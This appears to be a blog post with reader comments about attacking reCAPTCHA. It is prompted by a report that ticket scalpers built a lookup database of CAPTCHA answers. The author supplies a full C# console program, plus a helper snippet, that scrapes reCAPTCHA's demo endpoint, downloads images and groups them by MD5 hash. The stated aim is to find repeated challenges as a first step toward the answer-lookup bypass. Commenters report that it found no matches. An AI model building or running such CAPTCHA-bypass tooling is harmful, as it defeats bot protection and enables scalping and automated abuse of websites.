[The perpetrators] wrote a script that impersonated users trying to access Facebook, and downloaded hundreds of thousands of possible CAPTCHA challenges from reCAPTCHA. They identified the file ID of each CAPTCHA challenge and created a database of CAPTCHA “answers” to correspond to each ID. The bot would then identify the file ID of a challenge at Ticketmaster and feed back the corresponding answer.
If the writer was referring to the ID passed to http://api.recaptcha.net/image in the query string, that vulnerability appears to be fixed, since the ID is now temporary. However, the same images are still served more than once, and hashing each one with a cryptographic hash function such as MD5 lets us identify byte-identical duplicates. The following C# console application downloads a number of CAPTCHA images from reCAPTCHA (set by the imageCount constant), hashes each one, groups the files by hash, then writes the groups to a text file. Downloading as few as 1024 images can yield several identical images. Building on this, one could potentially pull off the reCAPTCHA attack described in the article.
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Security.Cryptography;
using System.Text;
using System.Text.RegularExpressions;

namespace reCAPTCHAScrape
{
    class Program
    {
        // Fetches a URL and returns the response body as a string.
        static string Request(string url)
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            using (WebResponse response = request.GetResponse())
            using (StreamReader reader =
                new StreamReader(response.GetResponseStream()))
                return reader.ReadToEnd();
        }

        // Downloads one CAPTCHA image from the reCAPTCHA demo page
        // and saves it as <fileNum>.jpg in the working directory.
        static void GetCaptchaImage(int fileNum)
        {
            // The demo page references a script whose body holds the challenge ID.
            Regex scriptURLRegex =
                new Regex(@"<script\s*type\s*=\s*""text/javascript""\s*" +
                          @"src\s*=\s*""([^""]+)""\s*><\s*/script>");
            Regex scriptRegex = new Regex(@"challenge\s*:\s*'([^']+)'");
            string pageURL = "http://recaptcha.net/fastcgi/demo/recaptcha";
            string resp = Request(pageURL);
            string scriptURL = scriptURLRegex.Match(resp).Groups[1].Value;
            resp = Request(scriptURL);
            string ID = scriptRegex.Match(resp).Groups[1].Value;
            string imageURL = "http://api.recaptcha.net/image?c=" + ID;
            HttpWebRequest request =
                (HttpWebRequest)WebRequest.Create(imageURL);
            byte[] image;
            using (WebResponse response = request.GetResponse())
            using (Stream s = response.GetResponseStream())
            using (MemoryStream ms = new MemoryStream())
            {
                // A single Read call may return only part of the response,
                // so keep reading until the stream is exhausted.
                byte[] buffer = new byte[8192];
                int len;
                while ((len = s.Read(buffer, 0, buffer.Length)) > 0)
                    ms.Write(buffer, 0, len);
                image = ms.ToArray();
            }
            // Write the file only after the whole image has been received.
            File.WriteAllBytes(fileNum + ".jpg", image);
        }

        // Hashes every .jpg in the directory, groups the files by MD5 digest,
        // and writes each digest followed by its files to a results file.
        static void DigestImages(string path)
        {
            DirectoryInfo info = new DirectoryInfo(path);
            FileInfo[] files = info.GetFiles("*.jpg");
            Dictionary<string, List<FileInfo>> digestDictionary =
                new Dictionary<string, List<FileInfo>>();
            using (MD5 md5 = MD5.Create())
            {
                foreach (FileInfo f in files)
                {
                    byte[] digest = md5.ComputeHash(File.ReadAllBytes(f.FullName));
                    StringBuilder hexStringBuilder = new StringBuilder();
                    foreach (byte b in digest)
                        hexStringBuilder.Append(b.ToString("x2"));
                    string hexString = hexStringBuilder.ToString();
                    List<FileInfo> group;
                    if (!digestDictionary.TryGetValue(hexString, out group))
                    {
                        group = new List<FileInfo>();
                        digestDictionary.Add(hexString, group);
                    }
                    group.Add(f);
                }
            }
            StringBuilder results = new StringBuilder();
            foreach (string s in digestDictionary.Keys)
            {
                results.AppendLine(s);
                foreach (FileInfo f in digestDictionary[s])
                    results.AppendLine(f.FullName);
                results.AppendLine();
            }
            string filename = @".\Results_" + Environment.TickCount + ".txt";
            File.WriteAllText(filename, results.ToString());
        }

        static void Main(string[] args)
        {
            const int imageCount = 1024;
            Console.Write("Downloading images");
            for (int i = 0; i < imageCount; i++)
            {
                try
                {
                    GetCaptchaImage(i);
                    Console.Write(".");
                }
                catch (Exception ex)
                {
                    // Report the failure and move on to the next image.
                    Console.WriteLine(ex.ToString());
                }
            }
            Console.WriteLine("\r\nSearching for matches...");
            DigestImages(@".\");
            Console.WriteLine("Complete. Press any key to continue...");
            Console.ReadKey();
        }
    }
}
A match in the output looks like this:
cf75401ef23c167260aa6d93bb7fbc42
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\533.jpg
C:\Source\reCAPTCHAScrape\reCAPTCHAScrape\bin\Debug\869.jpg
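The results file lists every digest, including those with only one file, so the matches have to be picked out by eye. As a rough sketch of how the grouping step could report only the duplicates, the snippet below hashes in-memory byte arrays and keeps just the groups with more than one member. The names DuplicateFinder, HexDigest and FindDuplicates are made up for this illustration, and the byte arrays are stand-ins for downloaded image data. Note that an exact hash only catches byte-identical files; two images that look the same but differ by a single byte will not match.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Security.Cryptography;
using System.Text;

static class DuplicateFinder
{
    // Returns the lowercase hex MD5 digest of a byte array.
    public static string HexDigest(byte[] data)
    {
        using (MD5 md5 = MD5.Create())
        {
            StringBuilder sb = new StringBuilder();
            foreach (byte b in md5.ComputeHash(data))
                sb.Append(b.ToString("x2"));
            return sb.ToString();
        }
    }

    // Groups item names by digest and keeps only digests shared by
    // two or more items (hypothetical helper, not part of the app above).
    public static Dictionary<string, List<string>> FindDuplicates(
        IDictionary<string, byte[]> items)
    {
        return items
            .GroupBy(kv => HexDigest(kv.Value), kv => kv.Key)
            .Where(g => g.Count() > 1)
            .ToDictionary(g => g.Key, g => g.ToList());
    }
}

static class Demo
{
    static void Main()
    {
        // Stand-in data: "0.jpg" and "2.jpg" have identical contents.
        var items = new Dictionary<string, byte[]>
        {
            { "0.jpg", new byte[] { 1, 2, 3 } },
            { "1.jpg", new byte[] { 4, 5, 6 } },
            { "2.jpg", new byte[] { 1, 2, 3 } },
        };
        foreach (var group in DuplicateFinder.FindDuplicates(items))
            Console.WriteLine(group.Key + ": " + string.Join(", ", group.Value));
    }
}
```

In the console application, the same filter could be applied to digestDictionary before the results are written, so that only groups containing two or more files end up in the text file.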
I'm currently testing this (in PHP though), but it doesn't work.
After 2000 files, no matching :(
I just ran it again and didn't get any either. It looks like the fun might be over for now, although I have another method in mind.
Hello John, I read your comment about having a new method in mind. I am interested in it. Would you mind posting an article or comment about it?
When I get some free time I'll post an article about it.
John, did you get that free time? I'm interested as well in any new techniques you have in mind.